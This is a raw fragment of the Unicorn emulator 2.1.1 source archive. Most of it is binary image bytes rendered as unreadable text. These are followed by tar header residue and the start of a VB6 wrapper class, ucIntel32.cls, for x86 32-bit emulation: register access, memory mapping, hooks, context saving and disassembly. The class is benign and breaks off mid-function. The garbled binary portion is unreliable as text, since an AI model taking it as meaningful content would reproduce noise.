V9(5g(Egd>y`t0iQ0 F(� �vl���tJ(8K@J���@T_ Dv <]< FA<* B!`ߤn@ ; }Q0 F(� hw; F(a+gm'N \8`Q0 F(��:`q(`pwRuI yVz\`Q0 F@��1 ���01iEV^f@]~�O"�ܱ ��VI -DįVdX]PV`;U{w�C RqDJ"lcPTCmoI31< F(<_[QF9E芳ѲcQ0 F(�2XFADluCQ za: Fs3;"ͣ`Q0 F(�ء���Ah���G ~���� W /���K ~���� W /���K ~���� W /���K ~���� W /���K ~���� W /���K ��� ߚbkqu pk�E�4hEo<1 65V=X3 F(`Q0 F(�jZ"lԜѢ r.{GgF(=L`Q0 F(>� .iuA7_5G(`Q0 F(�՗4:F,F)Q0y& Ж zr73NBn`Q0 F(���0�;&݅YWwe^3[ExZϘrg�'h~�#F(cLl'|L]ȳң(`Q0 �`i���w H+z:7Z�xعc��o( [@_ ʅɰpvW٭�_wRi�@TVG[=D!ƜQ[<`�b|bĔ/* !th1 F(`z�b# "Df mQ0p.5q(`Q0 F-@�v��a3a>lr���PM{/�uh���0a$sS5���lyh; F(`Q0 F(`ʄm}sOM �_4��0 ä] D{d��m=/_4��0 JaU? ^���M?N�سc���a]OӺ ^���r;ػ��b]OҺ@Hߵ��+>@*;AjqcPTC&7G(`Q0 F(�^� /f(`+dl>;1g(EgPGwtiڂQ0 F(` w03�سc#��bomZ$#V%3��;{xg%Gg ?d@eģ˔G(X�++qrĪEVOȱ ^B捂Q0 F(` u: F;`T^Vbub*wH F˳Q0 F(`d Ҍ@m .%Q0 F}:ĖfxI Wg}Q0 F(# /@���[@Qn*n+wOiѥ~gwtuQ@${jK؅\'c`Q0 F(^� /:G: 2blj~ yyQ@yÕ#|FKH FˎQ0 F(`䂁 D6Q7 DC Q0 å>j:R-KF(`Q@ /9^�1 ���°QAxZ {��X{ ���0z*Ȟ���1 ���0i]/����1 ���0i]/����1 ���0i]/����1 ���0i]/����1 ���0q p �жXx#�^PP$ƜV= `Q0 F(` /@�PKRsZtvA뀏Q0 h hG(`Q0 ^� /DȾH< F(`Q0 F(/^�b'`#Xw4gG( zM}>胖څ͝> F(`b h6+H퐎Q0FZl[ɓR C]4ZdQ0 F(` fxVNCqI8BnvG(N*-( 3<ZQ0 F(` fxg&��0CG?J8t(n �@;ю.upQ0 Hb+;U`ۯK]uh6 F(` L2vU`lcPTCN6Ć(/z#JiAr W1ZvQ0 F(# /@� P#!G^a=:[? Fs3;"ͣ`Q0 F(9` fxg4���Fi%]d��`qx+�1 ���0i]/����1 ���0i]/����1 ���0i]/����1 ���0i]/����1 ���0i]/����ݱ �� vtP-6-#�`�=蝌`hzge(`Q0 *^� `n $<XfiH/=d=5b0G;YQ0 F(C /@�v��`Zf6?�@b�Z @!~t>:lHp%E4c],om[c8GE.FC$9#IyLD?QEv홽PdAϻ[gtԱ*2P_;|p50 0<z?صA_KS q;mΤjqom ЯVݼw_C\j#5+C_�pV4v1n /]ݑXHj؟jk gWdY }`R��AoݯDab:_/ͫ7m,v  gYH{b~ռ`;lnAE<*㢨;[yA ^2XC 13 MԘ%MKCt&}`Q0 F` fx3:!4OͤdP OR̤Fw05)]:uZw|Q>s'oy$n"d53UO 5`Q0 F.03�9�@ O5A $(xW%e-Pf_)]9j+ɽh\>tZο; {Nٚ<wGA^ s:ɸJ/"f𙌿AA?:K�v �׽686'jQTvy~*“|&\920x}@{"SF\ M:\YSx*M.MA|`i���w=dOk^���r;4;<v0n(e(`Q0  ^� ��H2BA8pzGM!& n�h�1 ���0im��ܣN�سc���a]OӺ ^���r;سc���a]OӺ ^���r;ع���a[C�� oРInCs\p(`duG˅Q0 F(`b zJ3f.1JljhĆ7$ͣ`PSʎQ0 F(`t03�س��o= ny˨��|<%~/vwg]`>oe)jՓ_-!`Q0 F1 @4 }EYCx0hgwڕrي-'52{pi8`Q0 Fa03�B+όRsI&,5fG;` 1e/)e|kdcQ0 F(1 @THӮqKM;1.{G;`[0 F(`Q@ ^�A �� \hGOYκ/�@T?7dӅ~WbljHQGN-z: Fr t1jAv(b `Q0 F6^�bAFlCuM 5(kt~+px,`Q0 F@`ώi���% Jػ��V�سc���a]OӺ ^���r;سc���a]OӺ ^���r;سc���a]OӺ ^���r;سc���a]OӺ ^���r;سc���a]OӺ ^���r;ػ���b[CC 0?-�F�4hEo<1 &5f/`h0 F(`B` fx3Ԛu`16Ab$ƜpDh0 ͣ`P0vtG(`Q@,^�1�� 1;UA9$*#C j��p�^Yљ@Wzmh|A|%jS&|ku1zF(`Q0@:EF;ߣ`Jl"r#O|,F=4Z~Q0 F(# /@�fh#gv` _#y; F?)){ .\Q0 F(`L03�صc��` &B\$_x-,9nߕ\�\},#~Jt`uPqV9@`Q0 F( RqDӅ̇%Ɯf:Q0 6*ǐVBtyl˖m,(`Q0 b Xk`j`"F`SC0)4Q0 WRK5I'-KF(`Q���� K/w���1 ���0i]p x��= ���0z*ȞA��{ ���0z*ȞA��{ ���0z*ȞA��{ ���0z*ȞA��{ ��� l- ^w7hvxA?dLnCsQ0 F(e: F(`Q@m03�Bib.1Jjh=Q0 FVe@-`Q0 F(` fx3f@6֨@alqGQ0 FPQ0 F(`Pb X X )md .z!whQ3 F(,"Ԣю(`Q0 #^�^iᆾώ VbmDQ@ݲP^÷ d57.g`Q0 F@ <3:K~`RӬѲeQ0 F(1 =;6�a%[d0~x9R����! ��dAl]G KsܕYY�`4S#o+]$ƜQ0 FRgP9Ê/Q0 F(` 4^�bA!FlCZ0 65mQ0x1\Q0 F(` 603�سc���a E.��8=;��`T= �� 8=;��`T= �� 8=;��`T= �� 8=;��`T= �� 8=;��`T= �� 8=;��`T= �� 8;6�A�o lJrN��� / S6\;E5<G(`Q0 F( /@���[ d�w#G -{=��I�^_\3`$VF(`Q0 F(`8 -EFhBpGQ_d@Q0 F(`Q0 b �;wj���pQ&5wHB`5|IFM��XYlxO�ع���a[Cf��`_F�4%4KIYL\PDjJ掂Q0 F(`Q0 ^� /N _`z%KHlJg:t@)cQ0 F(`Q0 1 @TEcSO ʓ;1ذ%O`Q0 F(`1 =;��@_4*O+a";���k[صC��o]$m[ݢ��{kF��0L $#e��Xx#�1 ��� 60���;سc���a]OӺ ^���r;سc���a]OӺ ^���r;سc���a]OӺ ^���r;4h;ӎ1!3Ԑz35C/?Q0 [6`Q0 FP1 @T=T)SblԜ1z3!6|%~ bԌEF^(@hwQ0 Fp1 @TU7~;X5PE]F(`Q0 F1 @T}Dz1< (MOOQcHe$r G\# ;^Hq1jh'CwzLilQ0 F1 @4Ë<C7Noa[^`sd6A\WGp%ضy[1P/btQ0 F(b Xh^4Ó Bbrk5vǮѼ@qyIL1. 7ТN&.v(`Q /@�Q}yb2]t=ħEbOk`#lW_d5|@ǣ`Q0 F@Р<yvv)HbIRz]@66fs=Ajc4NG(`P /@�Qfj6-EU6D9M _h٘{SJC6لԌEF;)aMl^gWY,lig$VK8`Q0  s6u`SCA z]qC {;?Gش;=8 '/:]Բ&$MQ0 F(003�س��bv[!~6w�xx#�1 ���!A/1b@O�<Y<=;��`T4{��cx'�1 ���0i]/����1 ���0i]/����1 ���0i]/����"HG(e(`Lu(6` fxh؟Ҍ\R4Kc̆xM`Q0>F(``1 @T �UVV7 "U38`KppV7r`x!7[>x03�D/s +`сf\9``Q0 ^�Z[ �!k!njKZ}y_ƍuLڽɳ<>若ً 35J9<,y.aP04-4'fkV*5%U_)jW3jhlowg KN s}`r�Ao헉YN, \֐ٓE%?ٸ5k;Rj|rFֆV7%Fwa/`p=g0ELm>r R Uf8@}zQ/ޖ!�;0A뮚ha-eǦ4{Fn0HJUogr"2u9=OE+]v+Xfw^ E+du+h/ OOx)UGfxɟTW&l|ώd"奥Y:{ !}J35F+W!L0$ASGHPL?)|H܌^Sa:eP XΏ}$*vfG(` fxhPKj<;�{QC6Z+#!cl#Q@mr:6`@Ķ웘mԈz28BnGJ}JpJHѭD``1 ka/8y J[k'77` Ab-2Qpk/;c ٌOjm:h=[8w >YK9q7P3,ƕ穜Cxث9+*SZ ~(HzysN[�$�׽ Yl<Kȸ./:ô߱{]t.VԛgLWi|TsҹOc3&W:c[W'rNSQׇ,^j >}zNli^g4���Fi%]d��`qx+�Q0 F(ҀОZz=ÏP!}(` w0{xkD�� kF %;�0್`ώi���w=��  ���0z*ȞA��{ ���0z*ȞA��{ ����kcF2_x;��Xx#�ܡ ��  7w> O+*Av? N�) % k(zs+5*ab>uA#=]‹tEQ0ːF(e&vR /e(` 03�D^XłGg`$wNu6ői\Y]:p1 F(`Q0 F@` r�A+! -%=DmZ^ ?]lO;vm'r"͉Ps&:Xx?Hnds`ċR{]VtDcjU N>w"|e鿙.~o;� Q6 =:BE ٘ `.jJDc#Il&"JhW՞:(Ύߜ.tTPgA5ڮ8rw5VC:Gȝվw'Jh܉ #XFQIu;ӢqI2yJ;k#,P%d1yI=%yr!)sV#hes; F(# /@�ҌTd\ޣ`pEN==;CiikᚿF1CN0ZQ0 F(b UA;C6N@ f ;iNjJa8z'b@na\ Z\ׄmƓW d3TV܌`Q0@`Zv�AN& )X,F`H!/ifʢPҮ ȼ{%ug^Q?\V /4�\ddlY*cR/+;[۳6E_<^]u~2B2о* UxtG2+xnw3#05桡P7[ z9�@ {} X4hxOWx+]{ϕOj^Ij*KGIxB Vx#s=כgLQ:7a?^x�1 ��  |vx0�!-U�t- ��0�k_ t0EO�Zeu{2$]z�= (`Ѱ&7zuQ0 F(` fxw4���& '2~x`TF�سc���A]OEl`x��=wg4��� uA���wg4��� uA���wsF�� p<&Y^mȏ>6R7��T>@T%$Ht9d5ˉ;hyj(n`Q0 F(`|` fxg(� N.P*[,CU|s;v{_mg��.#�{wp�A^c,X7,}_ omSv8zz��~.طs�`oɅnJhFmJ6 ��lXx�۹ �0�mFF>J[뛣9]ng ��q}s6� : {>ha7Eݕ-oyr^e�� @t,#Lӛ F(`Q0 F(# /@�QuCvzڌ<Ë  >{:< F(`Q0 F(` fx3ĞBM-.9l|ljՁ}Բn`Q0 F(`\` fxg4���Fi%]d��`qx+�1 ���0i]/����1 ���0i]/����1 ���0i]/����1 ���0i]/����1 ���0i]/����1 ���0i]/����"FFF0B-{F(`Q0 F(# /@�Уǩ&:^]bH ۇ`Q0 F(`\03�D^X D#cBj;Yj܉SHn'`Q0 F(`b@ -=D$ӋY 9"=;o̸~:$Q0 F(`Q0 F!03�ط��boߏ Gȇ7݈b ��\�۱ ��<PK1v uz ��|�ܹ �0�NRP'/+͗µ]sv��1}w6��  XHs'٠A,4m) �� ŇU;u5.KlQ0 F(`Q0 F1 @TK̤:<m*`Q0 F(`L03�سc���a E.��8=;��`T= �� 8=;��`T= �� 8=;��`T= �� 8:4��a 0(.1/x��xwњlD+�vh��@tq6Tߡ9��\Խ];��`<pj] x��{r1ص��aԿm,\}���l8سC�`uM�swF?2Ik̪vzrN���`U��B _p 3y7o`njn}���7�^b:4vJG(`Q0 F(` rW.�طC�w~ A!3Xq+/gg��MUNnxs*� �Ap-o)`ovv_qU���}a "�@P&(m�WJd3k\ou���Gu:��@_4&88Z y��x޵ \KoF] ؔ &w)Q0 F(`Q0 F(:� �{wH���0kJ�jӈ7~Kڴ=���E�ص���A#��`i��`=#c&)g��� մ_�� FLr>W0<P] ��֛'(Npј`Q0 F(`Q@Ho�:&��a&GbV��0`ώi���w=\;Z.���&�܁ ��� {|��`d����[+��`d����[+��`d����[+��`d����[+��`d����[+��`��(� Do' L=n �!+Ik�#�{wh��@l]H1IFxWU7>Y#�'"�ځ ��� {|ő ��R_2����E ��R_2����E ��R_2����E ��R_2����E ��R_2����E ��R_2����E ��R_2����E ��Re4F(`  'FeQ0 F(3�~��� k<Zfx0=�_];���Կ-f�]�%�ڡ �� jATmA�yp@gVf` ��`,fJ|P �h�@`d����[+f���@�@���`=Hx��XJ�طC��``j= �GYs&�p7o6�� Y`c�1^�xOjfn �F�دc���a]^�8MoL-�lE�سc���a]sauL_! �~��� �6^ �pVt`ع���A $i���K ~���� W /���K ~���� W /���K ~���� W /���K ~���� W /���K ~���� W /���K ~���� W /���K �0#PuI$f"��oN�دc"��ao*z$0�LT"��N�دC#��b#+)dwox،�};���o}<rx��XJ�د���A"��`)د���A"��`)د���A"��`)د���A"��`)د���A"��`)د���A"��`)د���A"��`)ءc��a`l.���C4�� �f/=D`���7'�4c9 ����IENDB`��������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/ucIntel32.cls������������������������������������������������������������0000664�0000000�0000000�00000060637�14675241067�0017765�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������VERSION 1.0 CLASS BEGIN MultiUse = -1 'True Persistable = 0 'NotPersistable DataBindingBehavior = 0 'vbNone DataSourceBehavior = 0 'vbNone MTSTransactionMode = 0 'NotAnMTSObject END Attribute VB_Name = "ucIntel32" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = True Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Option Explicit 'Unicorn Engine x86 32bit wrapper class for vb6 'Contributed by: FireEye FLARE team 'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> 'License: Apache 2.0 'we hide the extra labor of x64 conversion from the user. I could simplify 'this at the C shim layer but I might write an x64 class later ' 'since the vb long type only natively supports signed math, I have also handed off a couple 'calculations in this class to a C stub just to be safe. ' 'you can find a full unsigned and x64 safe library for vb6 here: ' https://github.com/dzzie/libs/tree/master/vb6_utypes Public hLib As Long Public uc As Long Public errMsg As String Public Version As String Public major As Long Public minor As Long Private r32 As Variant Private r16 As Variant Private r8 As Variant Private rs_ As Variant Private rs_Name As Variant Private r32_Name As Variant Private r16_Name As Variant Private r8_Name As Variant Private hooks As New Collection Private m_DisasmOk As Boolean Event CodeHook(ByVal address As Long, ByVal size As Long) Event BlockHook(ByVal address As Long, ByVal size As Long) Event MemAccess(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long) Event InvalidMem(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long, ByRef continue As Boolean) Event Interrupt(ByVal intno As Long) 'our vb enum is 0 based then mapped to the real C values so we can loop them to dump with name lookup 'these sub enums also keep the intellisense lists short and focused when reading/writing vals 'they are accessed through reg32, reg16, reg8, rs properties, or use raw full enum through reg property 'the names of each can be looked up through the reg32n etc properties Public Enum reg_32 eax_r = 0 ecx_r = 1 edx_r = 2 ebx_r = 3 esp_r = 4 ebp_r = 5 esi_r = 6 edi_r = 7 End Enum Public Enum reg_16 ax_r = 0 cx_r = 1 dx_r = 2 bx_r = 3 sp_r = 4 bp_r = 5 si_r = 6 di_r = 7 End Enum Public Enum reg_8 ah_r = 0 ch_r = 1 dh_r = 2 bh_r = 3 al_r = 4 cl_r = 5 dl_r = 6 bl_r = 7 End Enum Public Enum reg_Special CS_r = 0 DS_r = 1 ES_r = 2 FS_r = 3 GS_r = 4 SS_r = 5 IDTR_r = 6 GDTR_r = 7 LDTR_r = 8 End Enum Property Get DisasmAvail() As Boolean DisasmAvail = m_DisasmOk End Property Property Get lastError() As Long lastError = ucs_errno(uc) End Property Property Get hadErr() As Boolean If Len(errMsg) > 0 Then hadErr = True End Property Property Get eip() As Long Dim e As uc_err, value As Long e = ucs_reg_read(uc, UC_X86_REG_EIP, value) eip = value End Property Property Let eip(v As Long) Dim e As uc_err e = ucs_reg_write(uc, UC_X86_REG_EIP, v) End Property Property Get eflags() As Long Dim e As uc_err, value As Long e = ucs_reg_read(uc, UC_X86_REG_EFLAGS, value) eflags = value End Property Property Let eflags(v As Long) Dim e As uc_err e = ucs_reg_write(uc, UC_X86_REG_EFLAGS, v) End Property 'full access to all registers if you need it.. Property Get reg(r As uc_x86_reg) As Long Dim e As uc_err, value As Long e = ucs_reg_read(uc, r, value) reg = value End Property Property Let reg(r As uc_x86_reg, value As Long) Dim e As uc_err e = ucs_reg_write(uc, r, value) End Property '32 bit registers Property Get reg32(r As reg_32) As Long Dim e As uc_err, value As Long If r < 0 Or r > UBound(r32) Then Exit Property e = ucs_reg_read(uc, r32(r), value) reg32 = value End Property Property Let reg32(r As reg_32, value As Long) Dim e As uc_err If r < 0 Or r > UBound(r32) Then Exit Property e = ucs_reg_write(uc, r32(r), value) End Property '16 bit registers Property Get reg16(r As reg_16) As Long Dim e As uc_err, value As Long If r < 0 Or r > UBound(r16) Then Exit Property e = ucs_reg_read(uc, r16(r), value) reg16 = CInt(value) End Property Property Let reg16(r As reg_16, ByVal value As Long) Dim e As uc_err value = value And &HFFFF If r < 0 Or r > UBound(r16) Then Exit Property e = ucs_reg_write(uc, r16(r), value) End Property '8 bit registers Property Get reg8(r As reg_8) As Long Dim e As uc_err, value As Long If r < 0 Or r > UBound(r8) Then Exit Property e = ucs_reg_read(uc, r8(r), value) reg8 = value End Property Property Let reg8(r As reg_8, ByVal value As Long) Dim e As uc_err value = value And &HFF If r < 0 Or r > UBound(r8) Then Exit Property e = ucs_reg_write(uc, r8(r), value) End Property 'special registers Property Get rs(r As reg_Special) As Long Dim e As uc_err, value As Long If r < 0 Or r > UBound(rs_) Then Exit Property e = ucs_reg_read(uc, rs_(r), value) rs = value End Property Property Let rs(r As reg_Special, ByVal value As Long) Dim e As uc_err If r < 0 Or r > UBound(rs_) Then Exit Property e = ucs_reg_write(uc, rs_(r), value) End Property 'reg index to name translation for looping Property Get reg32n(r As reg_32) As String If r < 0 Or r > UBound(r32_Name) Then Exit Property reg32n = r32_Name(r) End Property Property Get reg16n(r As reg_16) As String If r < 0 Or r > UBound(r16_Name) Then Exit Property reg16n = r16_Name(r) End Property Property Get reg8n(r As reg_8) As String If r < 0 Or r > UBound(r8_Name) Then Exit Property reg8n = r8_Name(r) End Property Property Get rsn(r As reg_Special) As String If r < 0 Or r > UBound(rs_Name) Then Exit Property rsn = rs_Name(r) End Property Function regDump(Optional includeState As Boolean = True) As String Dim i As Long Dim tmp As String For i = 0 To UBound(r32) tmp = tmp & reg32n(i) & "=" & Hex(reg32(i)) & " " 'if i mod 3 = 0 and i <> 0 then tmp = tmp & vbcrlf Next regDump = tmp If includeState Then regDump = regDump & "eip=" & Hex(Me.eip) & " " & dumpFlags() End If End Function Function dumpFlags() As String Dim ret() As String Dim n As Variant Dim i As Long Dim flags As Long 'http://www.c-jump.com/CIS77/ASM/Instructions/I77_0050_eflags.htm n = Array("C ", 0, "P ", 0, "A ", 0, "Z ", "S ", _ "T ", "I ", "D ", "O ", "IOPL ", "IOPL ", "NT ", 0, _ "RF ", "VM ", "AC ", "VIF ", "VIP ", "ID ", 0) flags = Me.eflags push ret, "EFL " & Hex(flags) For i = 0 To 21 If flags And ULong(1, i, op_lsh) Then If n(i) <> 0 Then push ret, n(i) End If Next dumpFlags = Join(ret, " ") End Function Private Sub Class_Initialize() Dim e As uc_err 'mapping our simplified to real values.. r32 = Array(UC_X86_REG_EAX, UC_X86_REG_ECX, UC_X86_REG_EDX, UC_X86_REG_EBX, UC_X86_REG_ESP, UC_X86_REG_EBP, UC_X86_REG_ESI, UC_X86_REG_EDI) r32_Name = Array("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi") r16 = Array(UC_X86_REG_AX, UC_X86_REG_CX, UC_X86_REG_DX, UC_X86_REG_BX, UC_X86_REG_SP, UC_X86_REG_BP, UC_X86_REG_SI, UC_X86_REG_DI) r16_Name = Array("ax", "cx", "dx", "bx", "sp", "bp", "si", "di") r8 = Array(UC_X86_REG_AH, UC_X86_REG_CH, UC_X86_REG_DH, UC_X86_REG_BH, UC_X86_REG_AL, UC_X86_REG_CL, UC_X86_REG_DL, UC_X86_REG_Bl) r8_Name = Array("ah", "ch", "dh", "bh", "al", "cl", "dl", "bl") rs_ = Array(UC_X86_REG_CS, UC_X86_REG_DS, UC_X86_REG_ES, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_SS, UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR) rs_Name = Array("cs", "ds", "es", "fs", "gs", "ss", "idtr", "gdtr", "ldtr") 'just to ensure IDE finds the dll before we try to use it... Const dllName As String = "ucvbshim.dll" If Len(UNICORN_PATH) = 0 Then UNICORN_PATH = vbNullString ElseIf FolderExists(UNICORN_PATH) Then UNICORN_PATH = UNICORN_PATH & IIf(Right(UNICORN_PATH, 1) = "\", "", "\") & "unicorn.dll" End If If hLib = 0 Then hLib = GetModuleHandle(dllName) If hLib = 0 Then hLib = LoadLibrary(GetParentFolder(UNICORN_PATH) & "\" & dllName) If hLib = 0 Then hLib = LoadLibrary(dllName) If hLib = 0 Then errMsg = "Could not load " & dllName Exit Sub End If End If End If End If If DYNLOAD = 0 Then DYNLOAD = ucs_dynload(UNICORN_PATH) If DYNLOAD = 0 Then errMsg = "Dynamic Loading of unicorn.dll failed " & IIf(Len(UNICORN_PATH) > 0, "path: " & UNICORN_PATH, "") Exit Sub End If End If ucs_version major, minor Version = major & "." & minor If ucs_arch_supported(UC_ARCH_X86) <> 1 Then errMsg = "UC_ARCH_X86 not supported" Exit Sub End If e = ucs_open(UC_ARCH_X86, UC_MODE_32, uc) If e <> uc_err_ok Then errMsg = "Failed to create new x86 32bit engine instance " & err2str(e) Exit Sub End If If GetProcAddress(hLib, "disasm_addr") <> 0 Then m_DisasmOk = True instances.Add Me, "objptr:" & ObjPtr(Me) End Sub Private Sub Class_Terminate() If uc = 0 Then Exit Sub stopEmu ucs_close uc On Error Resume Next instances.Remove "objptr:" & ObjPtr(Me) End Sub Function mapMem(address As Long, size As Long, Optional protection As uc_prot = UC_PROT_ALL) As Boolean Dim addr As Currency Dim e As uc_err errMsg = Empty addr = lng2Cur(address) e = ucs_mem_map(uc, addr, size, protection) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If mapMem = True End Function 'address and size must be 4kb aligned, real buffer must be at least of size, and not go out of scope! Function mapMemPtr(ByRef b() As Byte, address As Long, size As Long, Optional protection As uc_prot = UC_PROT_ALL) As Boolean Dim addr As Currency Dim e As uc_err errMsg = Empty addr = lng2Cur(address) If UBound(b) < size Then errMsg = "Buffer is < size" Exit Function End If If size Mod &H1000 <> 0 Then errMsg = "Size must be 4kb aligned" Exit Function End If If address Mod &H1000 <> 0 Then errMsg = "address must be 4kb aligned" Exit Function End If e = ucs_mem_map_ptr(uc, addr, size, protection, VarPtr(b(0))) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If mapMemPtr = True End Function Function findAlloc(address As Long, Optional inRange As Boolean = False) As CMemRegion Dim m As CMemRegion Dim found As Boolean For Each m In getMemMap() If inRange Then If ULong(address, m.address, op_gteq) = 1 And ULong(address, m.address, op_lteq) = 1 Then found = True Else If m.address = address Then found = True End If If found Then Set findAlloc = m Exit Function End If Next End Function 'we could accept a variant here instead of CMemRegion 'if typename(v) = "Long" then enum regions and find cmem, else expect CMemRegion.. 'would be convient.. or a findAlloc(base as long) as CMemRegion Function changePermissions(m As CMemRegion, newProt As uc_prot) Dim e As uc_err Dim addr64 As Currency errMsg = Empty If m Is Nothing Then Exit Function If newProt = m.perm Then changePermissions = True Exit Function End If addr64 = lng2Cur(m.address) e = ucs_mem_protect(uc, addr64, m.size, newProt) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If m.perm = newProt changePermissions = True End Function Function unMapMem(base As Long) As Boolean Dim m As CMemRegion Dim e As uc_err Dim addr64 As Currency errMsg = Empty addr64 = lng2Cur(base) For Each m In getMemMap() If m.address = base Then e = ucs_mem_unmap(uc, addr64, m.size) unMapMem = (e = uc_err_ok) If Not unMapMem Then errMsg = err2str(e) Exit Function End If Next End Function 'this function maps and writes (note 32bit only right now) Function writeBlock(address As Long, buf() As Byte, Optional perm As uc_prot = UC_PROT_ALL) As Boolean Dim addr As Currency Dim e As uc_err addr = lng2Cur(address) errMsg = Empty e = mem_write_block(uc, addr, buf(0), UBound(buf) + 1, perm) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If writeBlock = True End Function 'this function requires the memory already be mapped in, use writeBlock for easier access... Function writeMem(address As Long, buf() As Byte) As Boolean Dim addr As Currency Dim e As uc_err errMsg = Empty addr = lng2Cur(address) e = ucs_mem_write(uc, addr, buf(0), UBound(buf) + 1) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If writeMem = True End Function Function writeByte(address As Long, b As Byte) As Boolean Dim addr As Currency Dim e As uc_err Dim buf(0) As Byte errMsg = Empty addr = lng2Cur(address) buf(0) = b e = ucs_mem_write(uc, addr, buf(0), 1) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If writeByte = True End Function Function writeLong(address As Long, value As Long) As Boolean Dim addr As Currency Dim e As uc_err Dim buf(0 To 3) As Byte errMsg = Empty addr = lng2Cur(address) CopyMemory buf(0), ByVal VarPtr(value), 4 e = ucs_mem_write(uc, addr, buf(0), 4) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If writeLong = True End Function Function writeInt(address As Long, value As Integer) As Boolean Dim addr As Currency Dim e As uc_err Dim buf(0 To 1) As Byte errMsg = Empty addr = lng2Cur(address) CopyMemory buf(0), ByVal VarPtr(value), 2 e = ucs_mem_write(uc, addr, buf(0), 2) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If writeInt = True End Function Function readMem(address As Long, ByRef buf() As Byte, ByVal size As Long) As Boolean Dim addr As Currency Dim e As uc_err errMsg = Empty addr = lng2Cur(address) ReDim buf(size - 1) '0 based.. e = ucs_mem_read(uc, addr, buf(0), UBound(buf) + 1) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If readMem = True End Function Function readByte(address As Long, ByRef b As Byte) As Boolean Dim buf() As Byte readMem address, buf, 1 If hadErr Then Exit Function b = buf(0) readByte = True End Function Function readLong(address As Long, ByRef retVal As Long) As Boolean Dim buf() As Byte readMem address, buf, 4 If hadErr Then Exit Function CopyMemory ByVal VarPtr(retVal), buf(0), 4 readLong = True End Function Function readInt(address As Long, ByRef retVal As Integer) As Boolean Dim buf() As Byte readMem address, buf, 2 If hadErr Then Exit Function CopyMemory ByVal VarPtr(retVal), buf(0), 2 readInt = True End Function Function saveContext() As Long Dim hContext As Long Dim e As uc_err errMsg = Empty e = ucs_context_alloc(uc, hContext) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If e = ucs_context_save(uc, hContext) If e <> uc_err_ok Then errMsg = err2str(e) e = ucs_free(hContext) If e <> uc_err_ok Then errMsg = errMsg & " error freeing context: " & err2str(e) Exit Function End If saveContext = hContext End Function Function restoreContext(hContext As Long) As Boolean Dim e As uc_err errMsg = Empty e = ucs_context_restore(uc, hContext) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If restoreContext = True End Function Function freeContext(hContext As Long) As Boolean Dim e As uc_err e = ucs_free(hContext) If e <> uc_err_ok Then errMsg = err2str(e) Else freeContext = True End If End Function Function disasm(va As Long, Optional ByRef instrLen As Long) As String Dim buf As String, i As Long, b() As Byte Dim dump As String On Error Resume Next If Not m_DisasmOk Then disasm = Right("00000000" & Hex(va), 8) Exit Function End If buf = String(300, Chr(0)) instrLen = disasm_addr(uc, va, buf, Len(buf)) If instrLen < 1 Then Select Case instrLen Case -1: buf = "Buffer to small" Case -2: buf = "Failed to read memory" Case -3: buf = "Failed to disassemble" Case Default: buf = "Unknown error " & instrLen End Select dump = "?? ?? ??" GoTo end_of_func End If i = InStr(buf, Chr(0)) If i > 2 Then buf = VBA.Left(buf, i - 1) Else buf = Empty readMem va, b(), instrLen For i = 0 To UBound(b) dump = dump & hhex(b(i)) & " " Next end_of_func: disasm = Right("00000000" & Hex(va), 8) & " " & rpad(dump, 25) & buf End Function Function startEmu(beginAt As Long, endAt As Long, Optional timeout As Long = 0, Optional count As Long = 0) As Boolean Dim e As uc_err Dim a As Currency, b As Currency, t As Currency a = lng2Cur(beginAt) b = lng2Cur(endAt) t = lng2Cur(timeout) errMsg = Empty e = ucs_emu_start(uc, a, b, t, count) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If startEmu = True End Function Function stopEmu() As Boolean Dim e As uc_err errMsg = Empty e = ucs_emu_stop(uc) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If stopEmu = True End Function Function addHook(catagory As hookCatagory, flags As uc_hook_type, Optional beginAt As Long = 1, Optional endAt As Long = 0) As Boolean Dim e As uc_err Dim hHook As Long 'handle to remove hook Dim a As Currency, b As Currency e = -1 a = lng2Cur(beginAt) b = lng2Cur(endAt) errMsg = Empty If KeyExistsInCollection(hooks, "flags:" & flags) Then addHook = True Exit Function End If If catagory = hc_code Then e = ucs_hook_add(uc, hHook, flags, AddressOf code_hook, ObjPtr(Me), a, b, catagory) If catagory = hc_mem Then e = ucs_hook_add(uc, hHook, flags, AddressOf mem_hook, ObjPtr(Me), a, b, catagory) If catagory = hc_memInvalid Then e = ucs_hook_add(uc, hHook, flags, AddressOf invalid_mem_hook, ObjPtr(Me), a, b, catagory) If catagory = hc_block Then e = ucs_hook_add(uc, hHook, flags, AddressOf block_hook, ObjPtr(Me), a, b, catagory) If catagory = hc_int Then e = ucs_hook_add(uc, hHook, flags, AddressOf interrupt_hook, ObjPtr(Me), a, b, catagory) If e = -1 Then errMsg = "Unimplemented hook catagory" Exit Function End If If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If hooks.Add hHook, "flags:" & flags addHook = True End Function 'actually these appear to use different prototypes for each instruction? (only in/out examples seen...) 'what about all the others? not implemented yet in c or vb callback 'Function hookInstruction(i As uc_x86_insn, Optional beginAt As Long = 1, Optional endAt As Long = 0) As Boolean ' ' Dim e As uc_err ' Dim hHook As Long 'handle to remove hook ' Dim a As Currency, b As Currency ' ' If i = UC_X86_INS_INVALID Then Exit Function ' ' e = -1 ' a = 